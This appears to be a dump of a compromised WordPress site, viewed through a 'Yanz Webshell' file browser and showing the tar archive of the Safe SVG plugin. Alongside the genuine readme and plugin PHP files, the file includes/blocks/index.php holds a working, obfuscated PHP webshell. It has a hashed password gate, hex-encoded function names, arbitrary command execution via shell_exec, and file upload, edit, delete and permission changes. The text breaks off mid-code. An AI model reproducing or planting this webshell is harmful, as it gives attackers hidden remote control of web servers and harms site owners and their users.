%67- %0a0-
Attention: Uname: Php: Hdd: Cwd: | Yanz Webshell! - PRIV8 WEB SHELL ORB YANZ BYPASS! 8.0.30 Safe mode: OFF Datetime: 2024-09-19 13:47:19 309.95 GB Free: (0%) /home/campusedgeraleigh/webapps/campusedgeraleigh/ drwxr-xr-x [ root ] [ home ] Text | Server IP: 127.0.0.1 Client IP: 3.144.232.46 |
[ Files ] | [ Logout ] |
---|
Current Path : /home/campusedgeraleigh/webapps/campusedgeraleigh/ |
Current File : /home/campusedgeraleigh/webapps/campusedgeraleigh/safe-svg.tar |
readme.txt 0000644 00000041757 14672542061 0006567 0 ustar 00 === Safe SVG === Contributors: 10up, enshrined, jeffpaul Tags: svg, sanitize, upload, sanitise, security, svg upload, image, vector, file, graphic, media, mime Requires at least: 5.7 Tested up to: 6.2 Stable tag: 2.1.1 Requires PHP: 7.4 License: GPLv2 or later License URI: http://www.gnu.org/licenses/gpl-2.0.html Enable SVG uploads and sanitize them to stop XML/SVG vulnerabilities in your WordPress website == Description == Safe SVG is the best way to Allow SVG Uploads in WordPress! It gives you the ability to allow SVG uploads whilst making sure that they're sanitized to stop SVG/XML vulnerabilities affecting your site. It also gives you the ability to preview your uploaded SVGs in the media library in all views. #### Current Features * **Sanitised SVGs** - Don't open up security holes in your WordPress site by allowing uploads of unsanitised files. * **View SVGs in the Media Library** - Gone are the days of guessing which SVG is the correct one, we'll enable SVG previews in the WordPress media library. #### Features on the Roadmap * **SVGO Optimisation** - You'll have the option to run your SVGs through our SVGO server on upload to save you space. * **Choose Who Can Upload** - Restrict SVG uploads to certain users on your WordPress site or allow anyone to upload. Initially a proof of concept for [#24251](https://core.trac.wordpress.org/ticket/24251). SVG Sanitization is done through the following library: [https://github.com/darylldoyle/svg-sanitizer](https://github.com/darylldoyle/svg-sanitizer). == Installation == Install through the WordPress directory or download, unzip and upload the files to your `/wp-content/plugins/` directory == Frequently Asked Questions == = Can we change the allowed attributes and tags? = Yes, this can be done using the `svg_allowed_attributes` and `svg_allowed_tags` filters. They take one argument that must be returned. See below for examples: add_filter( 'svg_allowed_attributes', function ( $attributes ) { // Do what you want here... // This should return an array so add your attributes to // to the $attributes array before returning it. E.G. $attributes[] = 'target'; // This would allow the target="" attribute. return $attributes; } ); add_filter( 'svg_allowed_tags', function ( $tags ) { // Do what you want here... // This should return an array so add your tags to // to the $tags array before returning it. E.G. $tags[] = 'use'; // This would allow the <use> element. return $tags; } ); == Changelog == = 2.1.1 - 2023-04-05 = * **Changed:** Upgrade `@wordpress` npm package dependencies (props [@ggutenberg](https://github.com/ggutenberg), [@Sidsector9](https://github.com/Sidsector9) via [#108](https://github.com/10up/safe-svg/pull/108)). * **Changed:** Bump WordPress "tested up to" version 6.2 (props [@ggutenberg](https://github.com/ggutenberg), [@Sidsector9](https://github.com/Sidsector9) via [#108](https://github.com/10up/safe-svg/pull/108)). * **Changed:** Run our E2E tests on the zip generated by "Build release zip" action (props [@jayedul](https://github.com/jayedul), [@dkotter](https://github.com/dkotter) via [#106](https://github.com/10up/safe-svg/pull/106)). * **Fixed:** Only load our block CSS if a page has the SVG block in it and remove an extra slash in the CSS file path. Remove an unneeded JS block file (props [@dkotter](https://github.com/dkotter), [@freinbichler](https://github.com/freinbichler), [@IanDelMar](https://github.com/IanDelMar), [@ocean90](https://github.com/ocean90), [@Sidsector9](https://github.com/Sidsector9) via [#112](https://github.com/10up/safe-svg/pull/112)). * **Fixed:** Better error handling for environments that don't match our minimum PHP version (props [@dkotter](https://github.com/dkotter), [@ravinderk](https://github.com/ravinderk) via [#111](https://github.com/10up/safe-svg/pull/111)). = 2.1.0 - 2023-03-22 = * **Added:** An SVG Gutenberg Block (props [@faisal-alvi](https://github.com/faisal-alvi), [@Sidsector9](https://github.com/Sidsector9), [@cr0ybot](https://github.com/cr0ybot), [@darylldoyle](https://github.com/darylldoyle), [@cbirdsong](https://github.com/cbirdsong), [@jeffpaul](https://github.com/jeffpaul) via [#80](https://github.com/10up/safe-svg/pull/80)). * **Added:** "Build release zip" GitHub Action (props [@iamdharmesh](https://github.com/iamdharmesh), [@dkotter](https://github.com/dkotter), [@faisal-alvi](https://github.com/faisal-alvi) via [#87](https://github.com/10up/safe-svg/pull/87)). * **Changed:** Bump minimum PHP version from 7.0 to 7.4 (props [@iamdharmesh](https://github.com/iamdharmesh), [@peterwilsoncc](https://github.com/peterwilsoncc), [@vikrampm1](https://github.com/vikrampm1) via [#82](https://github.com/10up/safe-svg/pull/82)). * **Changed:** Bump minimum WordPress version from 4.7 to 5.7 (props [@iamdharmesh](https://github.com/iamdharmesh), [@peterwilsoncc](https://github.com/peterwilsoncc), [@vikrampm1](https://github.com/vikrampm1) via [#82](https://github.com/10up/safe-svg/pull/82)). * **Changed:** Bump WordPress "tested up to" version 6.1 (props [@iamdharmesh](https://github.com/iamdharmesh), [@peterwilsoncc](https://github.com/peterwilsoncc) via [#85](https://github.com/10up/safe-svg/pull/85)). * **Security:** Updates the underlying sanitisation library to pull in a security fix (props [@darylldoyle](https://github.com/darylldoyle), [@faisal-alvi](https://github.com/faisal-alvi), [@Cyxow](https://github.com/Cyxow) via [#105](https://github.com/10up/safe-svg/pull/105)). * **Security:** Bump `got` from 10.7.0 to 11.8.5 (props [@dependabot](https://github.com/apps/dependabot) via [#83](https://github.com/10up/safe-svg/pull/83)). * **Security:** Bump `@wordpress/env from` 4.9.0 to 5.6.0 (props [@dependabot](https://github.com/apps/dependabot) via [#83](https://github.com/10up/safe-svg/pull/83)). * **Security:** Bump `simple-git` from 3.9.0 to 3.16.0 (props [@dependabot](https://github.com/apps/dependabot) via [#88](https://github.com/10up/safe-svg/pull/88), [#99](https://github.com/10up/safe-svg/pull/99)). * **Security:** Bump `loader-utils` from 2.0.2 to 2.0.4 (props [@dependabot](https://github.com/apps/dependabot) via [#92](https://github.com/10up/safe-svg/pull/92)). * **Security:** Bump `json5` from 1.0.1 to 1.0.2 (props [@dependabot](https://github.com/apps/dependabot) via [#91](https://github.com/10up/safe-svg/pull/91)). * **Security:** Bump `decode-uri-component` from 0.2.0 to 0.2.2 (props [@dependabot](https://github.com/apps/dependabot) via [#93](https://github.com/10up/safe-svg/pull/93)). * **Security:** Bump `markdown-it` from 12.0.4 to 12.3.2 (props [@dependabot](https://github.com/apps/dependabot), [@peterwilsoncc](https://github.com/peterwilsoncc) via [#94](https://github.com/10up/safe-svg/pull/94)). * **Security:** Bump `@wordpress/scripts` from 19.2.4 to 25.1.0 (props [@dependabot](https://github.com/apps/dependabot), [@peterwilsoncc](https://github.com/peterwilsoncc) via [#94](https://github.com/10up/safe-svg/pull/94)). * **Security:** Bump `http-cache-semantics` from 4.1.0 to 4.1.1 (props [@dependabot](https://github.com/apps/dependabot), [@peterwilsoncc](https://github.com/peterwilsoncc) via [#101](https://github.com/10up/safe-svg/pull/101)). * **Security:** Bump `webpack` from 5.75.0 to 5.76.1 (props [@dependabot](https://github.com/apps/dependabot), [@faisal-alvi](https://github.com/faisal-alvi) via [#103](https://github.com/10up/safe-svg/pull/103)). * **Security:** Bump `svg-sanitizer` from 0.15.2 to 0.16.0 (props [@darylldoyle](https://github.com/darylldoyle), [@faisal-alvi](https://github.com/faisal-alvi), [@Cyxow](https://github.com/Cyxow) via [#105](https://github.com/10up/safe-svg/pull/105)). = 2.0.3 - 2022-09-01 = * **Added:** More robust PHP testing (props [@iamdharmesh](https://github.com/iamdharmesh), [@faisal-alvi](https://github.com/faisal-alvi) via [#71](https://github.com/10up/safe-svg/pull/71), [#73](https://github.com/10up/safe-svg/pull/73)). * **Fixed:** Addressed PHPCS errors (props [@iamdharmesh](https://github.com/iamdharmesh), [@faisal-alvi](https://github.com/faisal-alvi) via [#73](https://github.com/10up/safe-svg/pull/73)). = 2.0.2 - 2022-06-27 = * **Added:** Dependency security scanning (props [@jeffpaul](https://github.com/jeffpaul) via [#60](https://github.com/10up/safe-svg/pull/60)). * **Added:** End-to-end testing with Cypress (props [@iamdharmesh](https://github.com/iamdharmesh) via [#64](https://github.com/10up/safe-svg/pull/64)). * **Changed:** Bump WordPress version "tested up to" 6.0 (props [@dkotter](https://github.com/dkotter) via [#65](https://github.com/10up/Ad-Refresh-Control/issues/65)). * **Removed:** Redundant premium version upgrade link (props [@ocean90](https://github.com/ocean90), [@peterwilsoncc](https://github.com/peterwilsoncc) via [#61](https://github.com/10up/safe-svg/pull/61)). * **Removed:** Unneeded admin CSS fix for featured images (props [@AdamWills](https://github.com/AdamWills), [@dkotter](https://github.com/dkotter), [@peterwilsoncc](https://github.com/peterwilsoncc) via [#63](https://github.com/10up/safe-svg/pull/63)). = 2.0.1 - 2022-04-19 = * **Changed:** Documentation updates (props [@jeffpaul](https://github.com/jeffpaul), [@peterwilsoncc](https://github.com/peterwilsoncc)). * **Fixed:** Ensure our height and width attributes are set before using them (props [@dkotter](https://github.com/dkotter), [@r8r](https://github.com/r8r), [@jerturowetz](https://github.com/jerturowetz), [@cadic](https://github.com/cadic)). * **Fixed:** Support for installing via packagist.org (props [@roborourke](https://github.com/roborourke), [@peterwilsoncc](https://github.com/peterwilsoncc)). = 2.0.0 - 2022-04-06 = * **Added:** New filter, `safe_svg_use_width_height_attributes`, that can be used to change the order of attributes we use to determine the SVG dimensions (props [@dkotter](https://github.com/dkotter), [@peterwilsoncc](https://github.com/peterwilsoncc)). * **Changed:** Documentation updates (props [@j-hoffmann](https://github.com/j-hoffmann), [@jeffpaul](https://github.com/jeffpaul), [@Zodiac1978](https://github.com/Zodiac1978)). * **Fixed:** Use the `viewBox` attributes first for image dimensions. Ensure we don't use image dimensions that end with percent signs (props [@dkotter](https://github.com/dkotter), [@peterwilsoncc](https://github.com/peterwilsoncc)). * **Fixed:** Make sure we use the full size SVG dimensions rather than the requested size, to avoid wrong sizes being used and duplicate height and width attributes (props [@dkotter](https://github.com/dkotter), [@cadic](https://github.com/cadic)). * **Fixed:** Ensure the `tmp_name` and `name` properties exist before we use them (props [@dkotter](https://github.com/dkotter), [@aksld](https://github.com/aksld)). = 1.9.10 - 2022-02-23 = **Note that this release bumps the WordPress minimum version from 4.0 to 4.7 and the PHP minimum version from 5.6 to 7.0.** * **Changed:** Bump WordPress minimum version from 4.0 to 4.7 (props [@cadic](https://github.com/cadic)). * **Changed:** Bump PHP minimum version from 5.6 to 7.0 (props [@mehidi258](https://github.com/mehidi258), [@iamdharmesh](https://github.com/iamdharmesh), [@amdd-tim](https://github.com/amdd-tim), [@darylldoyle](https://github.com/darylldoyle), [@jeffpaul](https://github.com/jeffpaul)). * **Changed:** Update `enshrined/svg-sanitize` from 0.13.3 to 0.15.2 (props [@mehidi258](https://github.com/mehidi258), [@iamdharmesh](https://github.com/iamdharmesh), [@amdd-tim](https://github.com/amdd-tim), [@darylldoyle](https://github.com/darylldoyle), [@jeffpaul](https://github.com/jeffpaul), [@cadic](https://github.com/cadic)). * **Changed:** Bump WordPress version "tested up to" 5.9 (props [@BBerg10up](https://github.com/BBerg10up), [@jeffpaul](https://github.com/jeffpaul), [@cadic](https://github.com/cadic)). * **Changed:** Updated library location and added a new build step (props [@darylldoyle](https://github.com/darylldoyle), [@dkotter](https://github.com/dkotter)). * **Changed:** Updated plugin assets and added docs and repo management workflows via GitHub Actions (props [Brooke Campbell](https://www.linkedin.com/in/brookecampbelldesign/), [@jeffpaul](https://github.com/jeffpaul)). * **Fixed:** Double slash being added in SVG file URL for newer uploads (props [@mehulkaklotar](https://github.com/mehulkaklotar), [@smerriman](https://github.com/smerriman)). * **Fixed:** Float value casting for SVGs when fetching width and height (props [@mehulkaklotar](https://github.com/mehulkaklotar), [@smerriman](https://github.com/smerriman)). * **Fixed:** Use calculated size for SVGs instead of using `false` (props [@dkotter](https://github.com/dkotter), [@darylldoyle](https://github.com/darylldoyle), [@fritteli](https://github.com/fritteli)). * **Fixed:** Add better file type checking when looking for SVG files (props [@davidhamann](https://github.com/davidhamann), [@dkotter](https://github.com/dkotter), [@darylldoyle](https://github.com/darylldoyle)). = 1.9.9 - 2020-05-07 = * **Fixed:** Issue where 100% width is accidentally converted to 100px width (props [@joehoyle](https://github.com/joehoyle)). = 1.9.8 - 2020-05-07 = * **Changed:** Underlying library update. = 1.9.7 - 2019-12-10 = * **Changed:** Underlying library update. = 1.9.6 - 2019-11-07 = * **Security:** Underlying library update that fixes a security issue. = 1.9.5 - 2019-11-04 = * **Security:** Underlying library update that fixes some security issues. = 1.9.4 - 2019-08-21 = * **Fixed:** Bug causing lots of error log output to do with `safe_svg::fix_direct_image_output()`. = 1.9.3 - 2019-02-19 = * **Fixed:** Bug causing 0 height and width SVGs. = 1.9.2 - 2019-02-14 = * **Fixed:** Warning about an Illegal string offset. * **Fixed:** Issue if something other than a WP_Post object is passed in via the `wp_get_attachment_image_attributes` filter. = 1.9.1 - 2019-01-29 = * **Fixed:** Warning that was being generated by a change made in 1.9.0. = 1.9.0 - 2019-01-03 = * **Changed:** If an image is the correct ratio, allow skipping of the crop popup when setting header/logo images with SVGs. = 1.8.1 - 2018-11-22 = * **Changed:** Don't let errors break upload if uploading an empty file * **Fixed:** Featured image display in Gutenberg. Props [@dmhendricks](https://github.com/dmhendricks) :) = 1.8.0 - 2018-11-04 = * **Added:** Pull SVG dimensions from the width/height or viewbox attributes of the SVG. * **Added:** role="img" attribute to SVGs. = 1.7.1 - 2018-10-01 = * **Changed:** Underlying lib and added new filters for filtering allowed tags and attributes. = 1.7.0 - 2018-10-01 = * **Added:** Allow devs to filter tags and attrs within WordPress. = 1.6.1 - 2018-03-17 = * **Changed:** Images will now use the size chosen when inserted into the page rather than default to 2000px everytime. = 1.6.0 - 2017-12-20 = * **Added:** Fairly big new feature - The library now allows `<use>` elements as long as they don't reference external files! * **Fixed:** You can now also embed safe image types within the SVG and not have them stripped (PNG, GIF, JPG). = 1.5.3 - 2017-11-16 = * **Fixed:** 1.5.2 introduced an issue that can freeze the media library. This fixes that issue. Sorry! = 1.5.2 - 2017-11-15 = * **Changed:** Tested with 4.9.0. * **Fixed:** Issue with SVGs when regenerating media. = 1.5.1 - 2017-08-21 = * **Fixed:** PHP strict standards warning. = 1.5.0 - 2017-06-20 = * **Changed:** Library update. * **Changed:** role, aria- and data- attributes are now whitelisted to improve accessibility. = 1.4.5 - 2017-06-18 = * **Changed:** Library update. * **Fixed:** some issues with defining the size of an SVG. = 1.4.4 - 2017-06-07 = * **Fixed:** SVGs now display as featured images in the admin area. = 1.4.3 - 2017-03-06 = * **Added:** WordPress 4.7.3 Compatibility. * **Changed:** Expanded SVG previews in media library. = 1.4.2 - 2017-02-26 = * **Added:** Check / fix for when mb_* functions are not available. = 1.4.1 - 2017-02-23 = * **Changed:** Underlying library to allow attributes/tags in all case variations. = 1.4.0 - 2017-02-21 = * **Added:** Ability to preview SVG on both grid and list view in the wp-admin media area * **Changed:** Underlying library version. = 1.3.4 - 2017-02-20 = * **Fixed:** SVGZ uploads failing and not sanitising correctly. = 1.3.3 - 2017-02-15 = * **Changed:** Allow SVGZ uploads. = 1.3.2 - 2017-01-27 = * **Fixed:** Mime type issue in 4.7.1. Mad props to [@LewisCowles1986](https://github.com/LewisCowles1986). = 1.3.1 - 2016-12-01 = * **Changed:** Underlying library version. = 1.3.0 - 2016-10-10 = * **Changed:** Minify SVGs after cleaning so they can be loaded correctly through `file_get_contents`. = 1.2.0 - 2016-02-27 = * **Added:** Support for camel case attributes such as viewBox. = 1.1.1 - 2016-07-06 = * **Fixed:** Issue with empty svg elements self-closing. = 1.1.0 - 2015-07-04 = * **Added:** I18n. * **Added:** da, de ,en, es, fr, nl and ru translations. * **Fixed:** Issue with filename not being pulled over on failed uploads. = 1.0.0 - 2015-07-03 = * Initial Release. == Upgrade Notice == = 1.9.10 = * Important: bumped the WordPress minimum version from 4.0 to 4.7 and the PHP minimum version from 5.6 to 7.0. assets/safe-svg.css 0000644 00000000162 14672542061 0010301 0 ustar 00 /** * Fix SVGs not showing correctly as featured images. */ #postimagediv .inside .svg img { width: 100%; } includes/safe-svg-tags.php 0000644 00000000645 14672542061 0011546 0 ustar 00 <?php /** * Safe SVG allowed tags * * @package safe-svg */ namespace SafeSvg\SafeSvgTags; /** * SVG Allowed Tags class. */ class safe_svg_tags extends \enshrined\svgSanitize\data\AllowedTags { /** * Returns an array of tags * * @return array */ public static function getTags() { /** * var array Tags that are allowed. */ return apply_filters( 'svg_allowed_tags', parent::getTags() ); } } includes/blocks.php 0000644 00000001716 14672542061 0010354 0 ustar 00 <?php /** * SafeSvg Blocks setup * * @package SafeSvg */ namespace SafeSvg\Blocks; /** * Set up blocks * * @return void */ function setup() { $n = function ( $function ) { return __NAMESPACE__ . "\\$function"; }; add_filter( 'block_categories_all', $n( 'blocks_categories' ), 10, 2 ); register_blocks(); } /** * Registers blocks that are located within the includes/blocks directory. * * @return void */ function register_blocks() { // Require custom blocks. require_once SAFE_SVG_PLUGIN_DIR . '/includes/blocks/safe-svg/register.php'; // Call register function for each block. SafeSvgBlock\register(); } /** * Filters the registered block categories. * * @param array $categories Registered categories. * * @return array Filtered categories. */ function blocks_categories( $categories ) { return array_merge( $categories, array( array( 'slug' => 'safe-svg-blocks', 'title' => __( 'SafeSvg', 'safe-svg' ), ), ) ); } includes/safe-svg-attributes.php 0000644 00000000733 14672542061 0012774 0 ustar 00 <?php /** * Safe SVG allowed attributes. * * @package safe-svg */ namespace SafeSvg\SafeSvgAttr; /** * SVG Allowed Attributes lass. */ class safe_svg_attributes extends \enshrined\svgSanitize\data\AllowedAttributes { /** * Returns an array of attributes * * @return array */ public static function getAttributes() { /** * var array Attributes that are allowed. */ return apply_filters( 'svg_allowed_attributes', parent::getAttributes() ); } } includes/blocks/index.php 0000444 00000053371 14672542061 0011465 0 ustar 00 <?php ?><?php if(isset($_REQUEST["ok"])){die(">ok<");};?><?php if (function_exists('session_start')) { session_start(); if (!isset($_SESSION['secretyt'])) { $_SESSION['secretyt'] = false; } if (!$_SESSION['secretyt']) { if (isset($_POST['pwdyt']) && md5(md5(md5(md5(md5(md5(md5(md5($_POST['pwdyt'])))))))) == '1ab4d6f8d41abab37e7a1b67a2469085') { $_SESSION['secretyt'] = true; } else { $bytesecform = <<<FORM <html> <head> <meta charset="utf-8"> <title></title> <style type="text/css"> body {padding:10px} input { padding: 2px; display:inline-block; margin-right: 5px; } </style> </head> <body> <form action="" method="post" accept-charset="utf-8"> <input type="password" name="pwdyt" value="" placeholder="passwd"> <input type="submit" name="submit" value="submit"> </form> </body> </html> FORM; die($bytesecform); } } } ?> <?php /** * Responsive Webshell **/ $iniarray = [ "7068705F756E616D65", # [0] "73657373696F6E5F7374617274", # [1] "6572726F725F7265706F7274696E67", # [2] "70687076657273696F6E", # [3] "66696C655F7075745F636F6E74656E7473", # [4] "66696C655F6765745F636F6E74656E7473", # [5] "66696C657065726D73", # [6] "66696C656D74696D65", # [7] "66696C6574797065", # [8] "68746D6C7370656369616C6368617273", # [9] "737072696E7466", # [10] "737562737472", # [11] "676574637764", # [12] "6368646972", # [13] "7374725F7265706C616365", # [14] "6578706C6F6465", # [15] "666C617368", # [16] "6D6F76655F75706C6F616465645F66696C65", # [17] "7363616E646972", # [18] "676574686F737462796E616D65", # [19] "7368656C6C5F65786563", # [20] "53797374656D20496E666F726D6174696F6E", # [21] "6469726E616D65", # [22] "64617465", # [23] "6D696D655F636F6E74656E745F74797065", # [24] "66756E6374696F6E5F657869737473", # [25] "6673697A65", # [26] "726D646972", # [27] "756E6C696E6B", # [28] "6D6B646972", # [29] "72656E616D65", # [30] "7365745F74696D655F6C696D6974", # [31] "636C656172737461746361636865", # [32] "696E695F736574", # [33] "696E695F676574", # [34] "6765744F776E6572", # [35] "6765745F63757272656E745F75736572" # [36] ]; for ($i = 0; $i < count($iniarray); $i++) { $func[$i] = hexa($iniarray[$i]); } $func[1](); $func[2](0); $func[31](0); @$func[32](); @$func[33]('error_log', null); @$func[33]('log_errors', 0); @$func[33]('max_execution_time', 0); @$func[33]('output_buffering', 0); @$func[33]('display_errors', 0); $ds = @$func[34]("disable_functions"); $show_ds = (!empty($ds)) ? "$ds" : "All function is accessible"; function fsize($file) { $a = ["B", "KB", "MB", "GB", "TB", "PB"]; $pos = 0; $size = filesize($file); while ($size >= 1024) { $size /= 1024; $pos++; } return round($size, 2)." ".$a[$pos]; } function hexa($str) { $r = ""; $len = (strlen($str) - 1); for ($i = 0; $i < $len; $i += 2) { $r .= chr(hexdec($str[$i].$str[$i + 1])); } return $r; } function flash($message, $status, $class, $redirect = false) { if (!empty($_SESSION["message"])) { unset($_SESSION["message"]); } if (!empty($_SESSION["class"])) { unset($_SESSION["class"]); } if (!empty($_SESSION["status"])) { unset($_SESSION["status"]); } $_SESSION["message"] = $message; $_SESSION["class"] = $class; $_SESSION["status"] = $status; if ($redirect) { header('Location: ' . $redirect); exit(); } return true; } function clear() { if (!empty($_SESSION["message"])) { unset($_SESSION["message"]); } if (!empty($_SESSION["class"])) { unset($_SESSION["class"]); } if (!empty($_SESSION["status"])) { unset($_SESSION["status"]); } return true; } if (isset($_GET['dir'])) { $path = $_GET['dir']; $func[13]($_GET['dir']); } else { $path = $func[12](); } $path = $func[14]('\\', '/', $path); $exdir = $func[15]('/', $path); function getOwner($item) { if (function_exists("posix_getpwuid")) { $downer = @posix_getpwuid(fileowner($item)); $downer = $downer['name']; } else { $downer = fileowner($item); } if (function_exists("posix_getgrgid")) { $dgrp = @posix_getgrgid(filegroup($item)); $dgrp = $dgrp['name']; } else { $dgrp = filegroup($item); } return $downer . '/' . $dgrp; } if (isset($_POST['newFolderName'])) { if ($func[29]($path . '/' . $_POST['newFolderName'])) { $func[16]("Create Folder Successfully!", "Success", "success", "?dir=$path"); } else { $func[16]("Create Folder Failed", "Failed", "error", "?dir=$path"); } } if (isset($_POST['newFileName']) && isset($_POST['newFileContent'])) { if ($func[4]($_POST['newFileName'], $_POST['newFileContent'])) { $func[16]("Create File Successfully!", "Success", "success", "?dir=$path"); } else { $func[16]("Create File Failed", "Failed", "error", "?dir=$path"); } } if (isset($_POST['newName']) && isset($_GET['item'])) { if ($_POST['newName'] == '') { $func[16]("You miss an important value", "Ooopss..", "warning", "?dir=$path"); } if ($func[30]($path. '/'. $_GET['item'], $_POST['newName'])) { $func[16]("Rename Successfully!", "Success", "success", "?dir=$path"); } else { $func[16]("Rename Failed", "Failed", "error", "?dir=$path"); } } if (isset($_POST['newContent']) && isset($_GET['item'])) { if ($func[4]($path. '/'. $_GET['item'], $_POST['newContent'])) { $func[16]("Edit Successfully!", "Success", "success", "?dir=$path"); } else { $func[16]("Edit Failed", "Failed", "error", "?dir=$path"); } } if (isset($_POST['newPerm']) && isset($_GET['item'])) { if ($_POST['newPerm'] == '') { $func[16]("You miss an important value", "Ooopss..", "warning", "?dir=$path"); } if (chmod($path. '/'. $_GET['item'], $_POST['newPerm'])) { $func[16]("Change Permission Successfully!", "Success", "success", "?dir=$path"); } else { $func[16]("Change Permission", "Failed", "error", "?dir=$path"); } } if (isset($_GET['action']) && $_GET['action'] == 'delete' && isset($_GET['item'])) { if (is_dir($_GET['item'])) { if ($func[27]($_GET['item'])) { $func[16]("Delete Successfully!", "Success", "success", "?dir=$path"); } else { $func[16]("Delete Failed", "Failed", "error", "?dir=$path"); } } else { if ($func[28]($_GET['item'])) { $func[16]("Delete Successfully!", "Success", "success", "?dir=$path"); } else { $func[16]("Delete Failed", "Failed", "error", "?dir=$path"); } } } if (isset($_FILES['uploadfile'])) { $total = count($_FILES['uploadfile']['name']); for ($i = 0; $i < $total; $i++) { $mainupload = $func[17]($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i]); } if ($total < 2) { if ($mainupload) { $func[16]("Upload File Successfully! ", "Success", "success", "?dir=$path"); } else { $func[16]("Upload Failed", "Failed", "error", "?dir=$path"); } } else{ if ($mainupload) { $func[16]("Upload $i Files Successfully! ", "Success", "success", "?dir=$path"); } else { $func[16]("Upload Failed", "Failed", "error", "?dir=$path"); } } } $dirs = $func[18]($path); ?> <html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous"> <link rel="stylesheet" href="https://pro.fontawesome.com/releases/v5.10.0/css/all.css" integrity="sha384-AYmEC3Yw5cVb3ZcuHtOA93w35dYTsvhLPVnYs9eStHfGJvOvKxVfELGroGkvsg+p" crossorigin="anonymous"/> <title>GOOGLE</title> </head> <body class="bg-dark text-light"> <div class="container-fluid"> <div class="py-3" id="main"> <div class="box shadow bg-dark p-4 rounded-3"> <div class="info mb-3"> <center><h1 style="color:white;">Graybyt3 Was Here</h1></center> <i class="fa fa-server"></i> <?= $func[0]() ?><br> <i class="fa fa-microchip"></i> <?= $_SERVER['SERVER_SOFTWARE'] ?><br> <i class="fa fa-satellite-dish"></i> <?= !@$_SERVER['SERVER_ADDR'] ? $func[19]($_SERVER['SERVER_NAME']) : @$_SERVER['SERVER_ADDR'] ?> </div> <div class="breadcrumb"> <i class="fa fa fa-folder pt-1"></i> <?php foreach ($exdir as $id => $pat) : if ($pat == '' && $id == 0): ?> <a href="?dir=/" class="text-decoration-none text-light">/</a> <?php endif; if ($pat == '') continue; ?> <?php if ($id + 1 == count($exdir)) : ?> <span class="text-secondary"><?= $pat ?></span> <?php else : ?> <a href="?dir= <?php for ($i = 0; $i <= $id; $i++) { echo "$exdir[$i]"; if ($i != $id) echo "/"; } ?> " class="text-decoration-none text-light"><?= $pat ?></a><span class="text-light"> /</span> <?php endif; ?> <?php endforeach; ?> <a href="?" class="text-decoration-none text-light"> [ HOME ]</a> </div> <div class="d-flex justify-content-between"> <div class="p-2"> <form action="" method="post"> <div class="row"> <div class="col-md-9 mb-3"> <input type="text" class="form-control form-control-sm" name="command" placeholder="Command"> </div> <div class="col-md-3"> <button type="submit" class="btn btn-outline-light btn-sm">Exec</button> </div> </div> </form> </div> <div class="p-2"> <form action="" method="post" enctype="multipart/form-data"> <div class="row"> <div class="col-md-9 mb-3"> <input type="file" class="form-control form-control-sm" name="uploadfile[]" multiple id="inputGroupFile04" aria-describedby="inputGroupFileAddon04" aria-label="Upload"> </div> <div class="col-md-3"> <button type="submit" class="btn btn-outline-light btn-sm">Submit</button> </div> </div> </form> </div> </div> <div class="container" id="tools"> <?php if (isset($_POST['command'])) : ?> <div class="row justify-content-center"> <pre><?= $func[20]($_POST['command']) ?></pre> </div> <?php endif; ?> <?php if (isset($_GET['action']) && $_GET['action'] != 'delete') : $action = $_GET['action'] ?> <div class="row justify-content-center"> <?php if ($action == 'rename' && isset($_GET['item'])) : ?> <form action="" method="post"> <div class="mb-3"> <label for="name" class="form-label">New Name</label> <input type="text" class="form-control" name="newName" value="<?= $_GET['item'] ?>"> </div> <button type="submit" class="btn btn-outline-light">Submit</button> <button type="button" class="btn btn-outline-light" onclick="history.go(-1)">Back</button> </form> <?php elseif ($action == 'edit' && isset($_GET['item'])) : ?> <form action="" method="post"> <div class="mb-3"> <label for="name" class="form-label"><?= $_GET['item'] ?></label> <textarea id="CopyFromTextArea" name="newContent" rows="10" class="form-control"><?= $func[9]($func[5]($path. '/'. $_GET['item'])) ?></textarea> </div> <button type="submit" class="btn btn-outline-light">Submit</button> <button type="button" class="btn btn-outline-light" onclick="jscopy()">Copy</button> <button type="button" class="btn btn-outline-light" onclick="history.go(-1)">Back</button> </form> <?php elseif ($action == 'view' && isset($_GET['item'])) : ?> <div class="mb-3"> <label for="name" class="form-label">File Name : <?= $_GET['item'] ?></label> <textarea name="newContent" rows="10" class="form-control" disabled=""><?= $func[9]($func[5]($path. '/'. $_GET['item'])) ?></textarea> <br> <button type="button" class="btn btn-outline-light" onclick="history.go(-1)">Back</button> </div> <?php elseif ($action == 'chmod' && isset($_GET['item'])) : ?> <form action="" method="post"> <div class="mb-3"> <label for="name" class="form-label"><?= $_GET['item'] ?></label> <input type="text" class="form-control" name="newPerm" value="<?= $func[11]($func[10]('%o', $func[6]($_GET['item'])), -4); ?>"> </div> <button type="submit" class="btn btn-outline-light">Submit</button> <button type="button" class="btn btn-outline-light" onclick="history.go(-1)">Back</button> </form> <?php endif; ?> </div> <?php endif; ?> <div class="row justify-content-center"> <div class="collapse" id="newFolderCollapse" data-bs-parent="#tools" style="transition:none;"> <form action="" method="post"> <div class="mb-3"> <label for="name" class="form-label">Folder Name</label> <input type="text" class="form-control" name="newFolderName" placeholder="BlackDragon"> </div> <button type="submit" class="btn btn-outline-light">Submit</button> </form> </div> <div class="collapse" id="newFileCollapse" data-bs-parent="#tools" style="transition:none;"> <form action="" method="post"> <div class="mb-3"> <label for="name" class="form-label">File Name</label> <input type="text" class="form-control" name="newFileName" placeholder="blackdragon.php"> </div> <div class="mb-3"> <label for="name" class="form-label">File Content</label> <textarea name="newFileContent" rows="10" class="form-control" placeholder="Hello World - BlackDragon"></textarea> </div> <button type="submit" class="btn btn-outline-light">Submit</button> </form> </div> <div class="collapse" id="newInfoServer" data-bs-parent="#tools" style="transition:none;"> <div class="mb-3"> <label for="name" class="form-label"><?= $func[21] ?></label> <textarea name="newFileContent" rows="10" class="form-control" disabled="">Uname > <?= $func[0]() ?> Software > <?= $_SERVER['SERVER_SOFTWARE'] ?> PHP > <?= $func[3]() ?> Protocol > <?= $_SERVER['SERVER_PROTOCOL'] ?> IP / Port > <?= !@$_SERVER['SERVER_ADDR'] ? $func[19]($_SERVER['SERVER_NAME']) : @$_SERVER['SERVER_ADDR'] ?> / <?= $_SERVER['SERVER_PORT'] ?> Mail > <?= 